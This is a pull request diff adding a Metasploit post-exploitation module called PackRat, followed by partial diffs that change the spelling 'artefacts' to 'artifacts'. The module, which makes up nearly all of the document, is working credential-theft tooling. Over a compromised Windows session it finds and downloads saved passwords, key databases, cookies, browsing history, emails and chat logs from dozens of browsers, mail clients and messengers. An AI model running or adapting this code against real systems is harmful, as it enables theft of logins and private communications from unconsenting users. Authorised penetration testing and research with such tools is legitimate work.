### PR TITLE
Add 'PackRat' post exploitation module -- gathers many end user application artefacts

### DIFF
--- a/modules/post/windows/gather/enum_application_artefacts_packrat.rb
+++ b/modules/post/windows/gather/enum_application_artefacts_packrat.rb
@@ -1,0 +1,918 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/user_profiles'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info={})
+    super( update_info( info,
+    'Name'         => 'Windows Gather Application Artifacts (PackRat)',
+    'Description'  => %q{
+     PackRat gathers artifacts of various categories from a large number of applications.
+
+     Artefacts include: chat logins and logs, browser logins and history and cookies,
+     email logins and emails sent and received and deleted, contacts, and many others.
+     These artifacts are collected from applications including:
+     12 browsers, 13 chat/IM/IRC applications, 6 email clients, and 1 game.
+
+     The use case for this post-exploitation module is to specify the types of
+     artefacts you are interested in, to gather the relevant files depending on your aims.
+
+     Please refer to the options for a full list of filter categories.
+    },
+    'License'      => MSF_LICENSE,
+    'Author'       => [
+      'Barwar Salim M',  # Leeds Beckett University student
+      'Z. Cliffe Schreuders (http://z.cliffe.schreuders.org)'  # Leeds Beckett University lecturer
+    ],
+    'Platform'     => %w{win},
+    'SessionTypes' => ['meterpreter']
+    ))
+
+    register_options(
+    [
+      OptBool.new('STORE_LOOT', [false, 'Store artefacts into loot database (otherwise, only download)', 'true']),
+      # enumerates the options based on the artefacts that are defined below
+      OptEnum.new('APPCATEGORY', [false, 'Category of applications to gather from', 'All', @@apps.map{ |x| x[:category] }.uniq.unshift('All')]),
+      OptEnum.new('APPLICATION', [false, 'Specify application to gather from', 'All', @@apps.map{ |x| x[:application] }.uniq.unshift('All')]),
+      OptEnum.new('ARTEFACTS', [false, 'Type of artefacts to collect', 'All', @@apps.map{ |x| x[:filetypes] }.uniq.unshift('All')]),
+], self.class)
+  end
+
+  # this associative array defines the artefacts known to PackRat
+  @@apps= [
+    # Email clients
+    ## IncrediMail
+    {
+      :application=> 'incredimail',
+      :category => "emails",
+      :filetypes => "email_logs",
+      :path => 'LocalAppData',
+      :dir => 'IM',
+      :artefact=> "msg.iml",
+      :description => "IncrediMail's sent and received emails"},
+    ## Outlook
+    {
+      :application=> 'outlook',
+      :category => "emails",
+      :filetypes => "deleted_emails",
+      :path => 'LocalAppData',
+      :dir => 'Identities',
+      :artefact=> "Deleted Items.dbx",
+      :description => "Outlook's Deleted emails"},
+    {
+      :category => "emails",
+      :application=> 'outlook',
+      :filetypes => "draft_emails",
+      :path => 'LocalAppData',
+      :dir => 'Identities',
+      :artefact=> "Drafts.dbx",
+      :description => "Outlook's unsent emails"},
+    {
+      :application=> 'outlook',
+      :category => "emails",
+      :filetypes => "email_logs",
+      :path => 'LocalAppData',
+      :dir => 'Identities',
+      :artefact=> "Folders.dbx",
+      :description => "Outlook's Folders"},
+    {
+      :application=> 'outlook',
+      :category => "emails",
+      :filetypes => "received_emails",
+      :path => 'LocalAppData',
+      :dir => 'Identities',
+      :artefact=> "Inbox.dbx",
+      :description => "Outlook's received emails"},
+    {
+      :application=> 'outlook',
+      :category => "emails",
+      :filetypes => "email_logs",
+      :path => 'LocalAppData',
+      :dir => 'Identities',
+      :artefact=> "Offline.dbx",
+      :description => "Outlook's offline emails"},
+    {
+      :category => "emails",
+      :application=> 'outlook',
+      :filetypes => "email_logs",
+      :path => 'LocalAppData',
+      :dir => 'Identities',
+      :artefact=> "Outbox.dbx",
+      :description => "Outlook's sent emails"},
+    {
+      :application=> 'outlook',
+      :category => "emails",
+      :filetypes => "sent_emails",
+      :path => 'LocalAppData',
+      :dir => 'Identities',
+      :artefact=> "Sent Items.dbx",
+      :description => "Outlook's sent emails"},
+    ## Opera Mail
+    {
+      :category => "emails",
+      :application=> 'operamail',
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Opera Mail',
+      :artefact=> "wand.dat",
+      :description => "Opera-Mail's saved Username & Passwords"},
+    {
+      :application=> 'operamail',
+      :category => "emails",
+      :filetypes => "email_logs",
+      :path => 'LocalAppData',
+      :dir => 'Opera Mail',
+      :artefact=> "*.mbs",
+      :description => "Opera-Mail's emails"},
+    ## PostBox Mail
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "received_emails",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "INBOX",
+      :description => "Postbox's sent and received emails"},
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "sent_emails",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "Sent*",
+      :description => "Postbox's sent and received emails"},
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "email_logs",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "*.msf",
+      :description => "Postbox's sent and received emails"},
+    {
+      :category => "emails",
+      :application=> 'postbox',
+      :filetypes => "email_logs",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "Archive.msf",
+      :description => "Postbox's sent and received emails"},
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "email_logs",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "Bulk Mail.msf",
+      :description => "Postbox's junk emails"},
+    {
+      :category => "emails",
+      :application=> 'postbox',
+      :filetypes => "draft_emails",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "Draft.msf",
+      :description => "Postbox's unsent emails"},
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "received_emails",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "INBOX.msf",
+      :description => "Postbox's received emails"},
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "sent_emails",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "Sent*.msf",
+      :description => "Postbox's sent emails"},
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "sent_emails",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "Sent.msf",
+      :description => "Postbox's sent emails"},
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "email_logs",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "Templates.msf",
+      :description => "Postbox's template emails"},
+    {
+      :application=> 'postbox',
+      :category => "emails",
+      :filetypes => "deleted_emails",
+      :path => 'AppData',
+      :dir => 'Postbox',
+      :artefact=> "Trash.msf",
+      :description => "Postbox's Deleted emails"},
+    ## Mozilla Thunderbird Mail
+    {
+      :application=> 'thunderbird',
+      :category => "emails",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Thunderbird',
+      :artefact=> "signons.sqlite",
+      :description => "Thunderbird's saved Username & Passwords"},
+    {
+      :application=> 'thunderbird',
+      :category => "emails",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Thunderbird',
+      :artefact=> "key3.db",
+      :description => "Thunderbird's saved Username & Passwords"},
+    {
+      :application=> 'thunderbird',
+      :category => "emails",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Thunderbird',
+      :artefact=> "cert8.db",
+      :description => "Thunderbird's saved Username & Passwords"},
+    {
+      :application=> 'thunderbird',
+      :category => "emails",
+      :filetypes => "received_emails",
+      :path => 'AppData',
+      :dir => 'Thunderbird',
+      :artefact=> "Inbox",
+      :description => "Thunderbird's received emails"},
+    {
+      :application=> 'thunderbird',
+      :category => "emails",
+      :filetypes => "sent_emails",
+      :path => 'AppData',
+      :dir => 'Thunderbird',
+      :artefact=> "Sent",
+      :description => "Thunderbird's Send emails"},
+    {
+      :category => "emails",
+      :application=> 'thunderbird',
+      :filetypes => "deleted_emails",
+      :path => 'AppData',
+      :dir => 'Thunderbird',
+      :artefact=> "Trash",
+      :description => "Thunderbird's Deleted emails"},
+    {
+      :application=> 'thunderbird',
+      :category => "emails",
+      :filetypes => "draft_emails",
+      :path => 'AppData',
+      :dir => 'Thunderbird',
+      :artefact=> "Drafts",
+      :description => "Thunderbird's unsent emails"},
+    {
+      :category => "emails",
+      :application=> 'thunderbird',
+      :filetypes => "database",
+      :path => 'AppData',
+      :dir => 'Thunderbird',
+      :artefact=> "global-messages-db.sqlite",
+      :description => "emails info"},
+    ## Windows Live Mail
+    {
+      :application=> 'windowlivemail',
+      :category => "emails",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Microsoft',
+      :artefact=> "*.oeaccount",
+      :description => "Windows Live Mail's saved Username & Password"},
+    # Instant Messaging chats applications  x 13
+    ## AIM (Aol Instant Messaging)
+    {
+      :application=> 'AIM',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'LocalAppData',
+      :dir => 'AIM',
+      :artefact=> "aimx.bin",
+      :description => "AIM's saved Username & Passwords"},
+    {
+      :application=> 'AIM',
+      :category => "chats",
+      :filetypes => "chat_logs",
+      :path => 'LocalAppData',
+      :dir => 'AIM',
+      :artefact=> "*.html",
+      :description => "AIM's chat logs with date and times"},
+    ## Digsby is multi-protocol Instant Messaging client which lets the user to comunicate with all friends from many applications of other IM chat application such as AIM, MSN, Yahoo, ICQ, Google Talk,
+    {
+      :application=> 'digsby',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'LocalAppData',
+      :dir => 'Digsby',
+      :artefact=> "logininfo.yaml",
+      :description => "Digsby's saved Username & Passwords"},
+    ## GaduGadu, popular Polish chat (Poland country)
+    {
+      :application=> 'gadugadu',
+     :category => "chats",
+      :filetypes => "chat_logs",
+      :path => 'GG dysk',
+      :dir => 'Galeria',
+      :artefact=> "Thumbs.db",
+      :description => "Saved Gadu Gadu User Profile Images in Thumbs.db file"},
+    {
+      :application=> 'gadugadu',
+      :category => "chats",
+      :filetypes => "chat_logs",
+      :path => 'AppData',
+      :dir => 'GG',
+      :artefact=> "profile.ini",
+      :description => "GaduGadu profile User information : Rename long saved artefactto in profile.ini"},
+    ## ICQ chat is used for messaging, video and voice calls
+    {
+      :application=> 'ICQ',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'ICQ',
+      :artefact=> "Owner.mdb",
+      :description => "ICQ's saved Username & Passwords"},
+    {
+      :application=> 'ICQ',
+      :category => "chats",
+      :filetypes => "chat_logs",
+      :path => 'AppData',
+      :dir => 'ICQ',
+      :artefact=> "Messages.mdb",
+      :description => "ICQ's chat logs"},
+    ## Miranda is a multi protocol instant messaging client, protocols such as AIM (AOL Instant Messenger), Gadu-Gadu, ICQ, Tlen and others.
+    {
+      :application=> 'miranda',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Miranda',
+      :artefact=> "Home.dat",
+      :description => "Miranda's multi saved chat protocol Username, (coded Passwords"},
+    ## Nimbuzz
+    {
+      :application=> 'nimbuzz',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'nimbuzz',
+      :artefact=> "nimbuzz.log",
+      :description => "Username&Password - user phone number "},
+    ## Pidgen Pidgin is an easy to use and free chat client used by millions. Connect to AIM, MSN, Yahoo, and others
+    {
+      :application=> 'pidgen',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => '.purple',
+      :artefact=> "accounts.xml",
+      :description => "Pidgen's saved Username & Passwords"},
+    {
+      :application=> 'pidgen',
+      :category => "chats",
+      :filetypes => "chat_logs",
+      :path => 'AppData',
+      :dir => '.purple',
+      :artefact=> "*.html",
+      :description => "Pidgen's chat logs"},
+    ## QQ International is a Chinese online communication instant messagins with 750+ million existing users.
+    {
+      :application=> "QQ",
+      :category => "chats",
+      :filetypes => "chat_logs",
+      :path => 'AppData',
+      :dir => "Tencent",
+      :artefact=> "UserHeadTemp*",
+      :description => "QQ's Profile Image"},
+    ## Skype
+    {
+      :application=> 'skype',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Skype',
+      :artefact=> "main.db",
+      :description => "Skype's 's saved Username & Passwords"},
+    ## Tango - Texts and videos chat for mobiles and PCs
+    {
+      :application=> 'tango',
+     :category => "chats",
+      :filetypes => "database",
+      :path => 'LocalAppData',
+      :dir => 'tango',
+      :artefact=> "contacts.dat",
+      :description => "All Contact's name "},
+    {
+      :application=> 'tango',
+      :category => "chats",
+      :filetypes => "software_version",
+      :path => 'LocalAppData',
+      :dir => 'tango',
+      :artefact=> "install.log",
+      :description => "Tango Version "},
+    ## Tlen.pl is an adware licensed Polish instant messaging service. It is fully compatible with Gadu-Gadu instant messenger.
+    {
+      :application=> 'tlen.pl',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Tlen.pl',
+      :artefact=> "Profiles.dat",
+      :description => "Tlen.pl's saved Username & Passwords"},
+    {
+      :application=> 'tlen.pl',
+      :category => "chats",
+      :filetypes => "chat_logs",
+      :path => 'AppData',
+      :dir => 'Tlen.pl',
+      :artefact=> "*.jpg",
+      :description => "Tlen.pl sent Images"},
+    ## Trillian multi-protocol such as  AIM, ICQ.
+    {
+      :application=> 'trillian',
+      :category => "chats",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Trillian',
+      :artefact=> "accounts.ini",
+      :description => "Trillian's saved Username & Passwords"},
+    {
+      :application=> 'trillian',
+      :category => "chats",
+      :filetypes => 'chat_logs',
+      :path => 'AppData',
+      :dir => 'Trillian',
+      :artefact=> "*.log",
+      :description => "Trillian logs; Open the file"},
+    ## Viber - Texts and videos chat for mobiles and PCs
+    {
+      :application=> 'viber',
+      :category => "chats",
+      :filetypes => "database",
+      :path => 'AppData',
+      :dir => 'ViberPC',
+      :artefact=> "viber.db",
+      :description => "All Contact's names, numbers, sms are saved from user's mobile"},
+    {
+      :application=> 'viber',
+      :category => "chats",
+      :filetypes => "thumbs",
+      :path => 'AppData',
+      :dir => 'ViberPC',
+      :artefact=> "Thumbs.db",
+      :description => "Viber's Contact's profile images in Thumbs.db file"},
+    {
+      :application=> 'viber',
+     :category => "chats",
+      :filetypes => "images",
+      :path => 'AppData',
+      :dir => 'ViberPC',
+      :artefact=> "*.jpg",
+      :description => "Collects all images of contacts and sent recieved"},
+     ## xChat  is used also for
+    {
+      :application=> 'xchat',
+      :category => "chats",
+      :filetypes => "chat_logs",
+      :path => 'AppData',
+      :dir => 'X-Chat 2',
+      :artefact=> "*.txt",
+      :description => "Collects all chatting conversations of sent and recieved"},
+    # Gaming  x1
+    ## Xfire is popular for gaming
+    {
+      :application=> 'xfire',
+      :category => "gaming",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => 'Xfire',
+      :artefact=> "xfireUser.ini",
+      :description => "Xfire saved Username & Passwords"},
+    {
+      :application=> 'xfire',
+      :category => "gaming",
+      :filetypes => "logins",
+      :path => 'AppDataLocal',
+      :dir => 'Xfire',
+      :artefact=> "xfireUser.ini",
+      :description => "Xfire saved Username & Passwords"},
+    #Web Browsers applications x 13
+    ## Avant
+    {
+      :application=> "avant",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir =>'Avant Profiles',
+      :artefact=> "forms.dat",
+      :description => "Avant's saved Username & Passwords"},
+    ## Comodo
+    {
+      :application=> "comodo",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'LocalAppData',
+      :dir =>'COMODO',
+      :artefact=> "Login Data",
+      :description => "Comodo's saved Username & Passwords"},
+    {
+      :application=> "comodo",
+      :category => "browsers",
+      :filetypes => "cookies",
+      :path => 'LocalAppData',
+      :dir =>'COMODO',
+      :artefact=> "Cookies",
+      :description => "Cookies"},
+    {
+      :application=> "comodo",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'LocalAppData',
+      :dir =>'COMODO',
+      :artefact=> "History",
+      :description => "Comodo's History"},
+    {
+      :application=> "comodo",
+     :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'LocalAppData',
+      :dir =>'COMODO',
+      :artefact=> "Visited Links",
+      :description => "Comodo's History"},
+    ## CoolNovo
+    {
+      :application=> "coolnovo",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'LocalAppData',
+      :dir =>'MapleStudio',
+      :artefact=> "Login Data",
+      :description => "Comodo's saved Username & Passwords"},
+    ## Chrome
+    {
+      :application=> "chrome",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'LocalAppData',
+      :dir => "Google",
+      :artefact=> "Login Data",
+      :description => "Chrome's saved Username & Passwords"},
+    {
+      :application=> "chrome",
+      :category => "browsers",
+      :filetypes => "cookies",
+      :path => 'LocalAppData',
+      :dir => "Google",
+      :artefact=> "Cookies",
+      :description => "Chrome Cookies"},
+    {
+      :application=> "chrome",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'LocalAppData',
+      :dir => "Google",
+      :artefact=> "History",
+      :description => "Chrome History"},
+    ## FireFox
+    {
+      :application=> "firefox",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "logins.json",
+      :description => "Firefox's saved Username & Passwords "},
+    {
+      :application=> "firefox",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "cert8.db",
+      :description => "Firefox's saved Username & Passwords"},
+    {
+      :application=> "firefox",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "key3.db",
+      :description => "Firefox's saved Username & Passwords"},
+    {
+      :application=> "firefox",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "places.sqlite",
+      :description => "FireFox History"},
+    {
+      :application=> "firefox",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'AppData',
+      :dir =>'Mozilla',
+      :artefact=> "formhistory.sqlite",
+      :description => "FireFox's saved Username using sqlite tool"},
+    {
+      :application=> "firefox",
+      :category => "browsers",
+      :filetypes => "cookies",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "cookies.sqlite",
+      :description => "Firefox's cookies"},
+    ## Flock
+    {
+      :application=> "flock",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir =>'Flock',
+      :artefact=> "formhistory.sqlite",
+      :description => "Flock's saved Username"},
+    {
+      :application=> "flock",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'AppData',
+      :dir =>'Flock',
+      :artefact=> "downloads.sqlite",
+      :description => "Flock's downloaded files"},
+    {
+      :application=> "flock",
+      :category => "browsers",
+      :filetypes => "cookies",
+      :path => 'AppData',
+      :dir =>'Flock',
+      :artefact=> "cookies.sqlite",
+      :description => "Flock's Cookies file"},
+    ## IE
+    {
+      :application=> "IE",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'LocalSettings',
+      :dir =>'History',
+      :artefact=> "index.dat",
+      :description => "IE's History"},
+    ## K-Meleon
+    {
+      :application=> "k-meleon",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "K-Meleon",
+      :artefact=> "signons.sqlite",
+      :description => "K-Meleon's saved Username & Passwords"},
+    {
+      :application=> "k-meleon",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "K-Meleon",
+      :artefact=> "key3.db",
+      :description => "K-Meleon's saved Username & Passwords"},
+    {
+      :application=> "k-meleon",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "K-Meleon",
+      :artefact=> "cert8.db",
+      :description => "K-Meleon's saved Username & Passwords"},
+    {
+      :application=> "k-meleon",
+      :category => "browsers",
+      :filetypes => "cookies",
+      :path => 'AppData',
+      :dir => "K-Meleon",
+      :artefact=> "cookies.sqlite",
+      :description => "K-Meleon's Cookies"},
+    {
+      :application=> "k-meleon",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'AppData',
+      :dir => "K-Meleon",
+      :artefact=> "formhistory.sqlite",
+      :description => "K-Meleon's Visited websites history"},
+    {
+      :application=> "k-meleon",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'AppData',
+      :dir => "K-Meleon",
+      :artefact=> "places.sqlite",
+      :description => "K-Meleon's Visited websites history"},
+    ## Maxthon
+    {
+      :application=> "maxthon",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Maxthon3",
+      :artefact=> "MagicFill2.dat",
+      :description => "Maxthon's saved Username & Passwords"},
+    ## Opera
+    {
+      :application=> "opera",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Opera Software",
+      :artefact=> "Login Data",
+      :description => "Opera's saved Username & Passwords"},
+    {
+      :application=> "opera",
+      :category => "browsers",
+      :filetypes => "cookies",
+      :path => 'AppData',
+      :dir => "Opera Software",
+      :artefact=> "Cookies",
+      :description => "Opera Cookies"},
+    {
+      :application=> "opera",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'AppData',
+      :dir => "Opera Software",
+      :artefact=> "Visited Links",
+      :description => "Opera Visited Links"},
+    ## SRware
+    {
+      :application=> "srware",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'LocalAppData',
+      :dir => "Chromium",
+      :artefact=> "Login Data",
+      :description => "SRware's saved Username & Passwords"},
+    {
+      :application=> "srware",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'LocalAppData',
+      :dir => "Chromium",
+      :artefact=> "Cookies",
+      :description => "SRware's Cookies"},
+    {
+      :application=> "srware",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'LocalAppData',
+      :dir => "Chromium",
+      :artefact=> "History",
+      :description => "SRware's Visited websites history"},
+    ## Safari
+    {
+      :application=> "safari",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Apple Computer",
+      :artefact=> "keychain.plist",
+      :description => "Safari History"},
+    ## SeaMonkey
+    {
+      :application=> "seamonkey",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "logins.json",
+      :description => "SeaMonkey's saved Username & Passwords"},
+    {
+      :application=> "seamonkey",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "cert8.db",
+      :description => "SeaMonkey's saved Username & Passwords"},
+    {
+      :application=> "seamonkey",
+      :category => "browsers",
+      :filetypes => "logins",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "key3.db",
+      :description => "SeaMonkey's saved Username & Passwords"},
+    {
+      :application=> "seamonkey",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'AppData',
+      :dir =>'Mozilla',
+      :artefact=> "formhistory.sqlite",
+      :description => "SeaMonkey's saved Username"},
+    {
+      :application=> "seamonkey",
+      :category => "browsers",
+      :filetypes => "web_history",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "places.sqlite",
+      :description => "SeaMonkey History"},
+    {
+      :application=> "seamonkey",
+      :category => "browsers",
+      :filetypes => "cookies",
+      :path => 'AppData',
+      :dir => "Mozilla",
+      :artefact=> "cookies.sqlite",
+      :description => "SeaMonkey's cookies"}
+  ]
+  @@success_count = 0
+  @@try_count = 0
+
+  def run
+    print_line("\nPackRat is searching and gathering...\n")
+    print_line("Filtering based on these selections: \n")
+    print_line("\tAPPCATEGORY: #{datastore['APPCATEGORY'].capitalize}, APPLICATION: #{datastore['APPLICATION'].capitalize}, ARTEFACTS: #{datastore['ARTEFACTS'].capitalize}\n")
+
+    @@success_count = 0
+    @@try_count = 0
+    #used to grab files for each user on the remote host.
+    grab_user_profiles.each do |userprofile|
+      @@apps.each { |f| downloading(userprofile, f) }
+    end
+    print_status("Downloaded #{@@success_count} artefact(s), attempted #{@@try_count}.\n")
+  end
+
+  # Check to see if the artifact exists on the remote system.
+  def location(profile, opts={})
+    path = profile[opts[:path]]
+    dir = opts[:dir]
+    dirs = session.fs.dir.foreach(path).collect
+    return dirs.include? dir
+    end
+
+  # Download file from the remote system, if it exists.
+  def downloading(profile, opts={})
+    cat = opts[:category]
+    app = opts[:application]
+    artefact = opts[:artefact]
+    ft = opts[:filetypes]
+    dir = opts[:dir]
+    path = opts[:path]
+
+    # filter based on options
+    if (cat != datastore['APPCATEGORY'] && datastore['APPCATEGORY'] != 'All') || (app != datastore['APPLICATION'] && datastore['APPLICATION'] != 'All') || (ft != datastore['ARTEFACTS'] && datastore['ARTEFACTS'] != 'All')
+      # doesn't match search criteria, skip this artefact
+      return false
+    end
+
+    @@try_count += 1
+    print_status("Searching for #{app.capitalize}'s #{artefact.capitalize} files in #{profile['UserName']}'s user directory...")
+    # check if file exists in user's directory on the remote computer.
+    if location(profile, opts)
+      print_status("#{app.capitalize}'s #{artefact.capitalize} file found")
+    else
+      print_error("#{app.capitalize}'s #{artefact.capitalize} not found in #{profile['UserName']}'s user directory\n")
+      # skip non-existing file
+      return false
+    end
+
+    # read from app array above
+    artefact = opts[:artefact]
+    dir = opts[:dir]
+    path = opts[:path]
+    description = opts[:description]
+    file_dir = "#{profile[path]}\\#{dir}"
+    file = session.fs.file.search(file_dir, "#{artefact}", true)
+    # additional check for file
+    return false unless file
+
+    file.each do |db|
+      # split path for each directory
+      guid = db['path'].split('\\')
+      local_loc = "#{guid.last}#{artefact}"
+      saving_path = store_loot("#{app}#{artefact}", "", session, "", local_loc)
+      maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
+      print_status("Downloading #{maindb}")
+      session.fs.file.download_file(saving_path, maindb)
+      print_status("#{app.capitalize} #{artefact.capitalize} downloaded (#{description})")
+      print_good("File saved to #{saving_path}\n")
+      @@success_count += 1
+    end
+    return true
+  end
+end

--- a/modules/post/windows/gather/enum_application_artifacts_packrat.rb
+++ b/modules/post/windows/gather/enum_application_artifacts_packrat.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
       # enumerates the options based on the artifacts that are defined below
       OptEnum.new('APPCATEGORY', [false, 'Category of applications to gather from', 'All', @@apps.map{ |x| x[:category] }.uniq.unshift('All')]),
       OptEnum.new('APPLICATION', [false, 'Specify application to gather from', 'All', @@apps.map{ |x| x[:application] }.uniq.unshift('All')]),
-      OptEnum.new('ARTEFACTS', [false, 'Type of artifacts to collect', 'All', @@apps.map{ |x| x[:filetypes] }.uniq.unshift('All')]),
+      OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', @@apps.map{ |x| x[:filetypes] }.uniq.unshift('All')]),
 ], self.class)
   end
 
@@ -846,7 +846,7 @@ class Metasploit3 < Msf::Post
   def run
     print_line("\nPackRat is searching and gathering...\n")
     print_line("Filtering based on these selections: \n")
-    print_line("\tAPPCATEGORY: #{datastore['APPCATEGORY'].capitalize}, APPLICATION: #{datastore['APPLICATION'].capitalize}, ARTEFACTS: #{datastore['ARTEFACTS'].capitalize}\n")
+    print_line("\tAPPCATEGORY: #{datastore['APPCATEGORY'].capitalize}, APPLICATION: #{datastore['APPLICATION'].capitalize}, ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}\n")
 
     @@success_count = 0
     @@try_count = 0
@@ -875,7 +875,7 @@ class Metasploit3 < Msf::Post
     path = opts[:path]
 
     # filter based on options
-    if (cat != datastore['APPCATEGORY'] && datastore['APPCATEGORY'] != 'All') || (app != datastore['APPLICATION'] && datastore['APPLICATION'] != 'All') || (ft != datastore['ARTEFACTS'] && datastore['ARTEFACTS'] != 'All')
+    if (cat != datastore['APPCATEGORY'] && datastore['APPCATEGORY'] != 'All') || (app != datastore['APPLICATION'] && datastore['APPLICATION'] != 'All') || (ft != datastore['ARTIFACTS'] && datastore['ARTIFACTS'] != 'All')
       # doesn't match search criteria, skip this artifact
       return false
     end

--- a/modules/post/windows/gather/enum_application_artifacts_packrat.rb
+++ b/modules/post/windows/gather/enum_application_artifacts_packrat.rb
@@ -18,13 +18,13 @@ class Metasploit3 < Msf::Post
     'Description'  => %q{
      PackRat gathers artifacts of various categories from a large number of applications.
 
-     Artefacts include: chat logins and logs, browser logins and history and cookies,
+     Artifacts include: chat logins and logs, browser logins and history and cookies,
      email logins and emails sent and received and deleted, contacts, and many others.
      These artifacts are collected from applications including:
      12 browsers, 13 chat/IM/IRC applications, 6 email clients, and 1 game.
 
      The use case for this post-exploitation module is to specify the types of
-     artefacts you are interested in, to gather the relevant files depending on your aims.
+     artifacts you are interested in, to gather the relevant files depending on your aims.
 
      Please refer to the options for a full list of filter categories.
     },
@@ -39,15 +39,15 @@ class Metasploit3 < Msf::Post
 
     register_options(
     [
-      OptBool.new('STORE_LOOT', [false, 'Store artefacts into loot database (otherwise, only download)', 'true']),
-      # enumerates the options based on the artefacts that are defined below
+      OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database (otherwise, only download)', 'true']),
+      # enumerates the options based on the artifacts that are defined below
       OptEnum.new('APPCATEGORY', [false, 'Category of applications to gather from', 'All', @@apps.map{ |x| x[:category] }.uniq.unshift('All')]),
       OptEnum.new('APPLICATION', [false, 'Specify application to gather from', 'All', @@apps.map{ |x| x[:application] }.uniq.unshift('All')]),
-      OptEnum.new('ARTEFACTS', [false, 'Type of artefacts to collect', 'All', @@apps.map{ |x| x[:filetypes] }.uniq.unshift('All')]),
+      OptEnum.new('ARTEFACTS', [false, 'Type of artifacts to collect', 'All', @@apps.map{ |x| x[:filetypes] }.uniq.unshift('All')]),
 ], self.class)
   end
 
-  # this associative array defines the artefacts known to PackRat
+  # this associative array defines the artifacts known to PackRat
   @@apps= [
     # Email clients
     ## IncrediMail
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Post
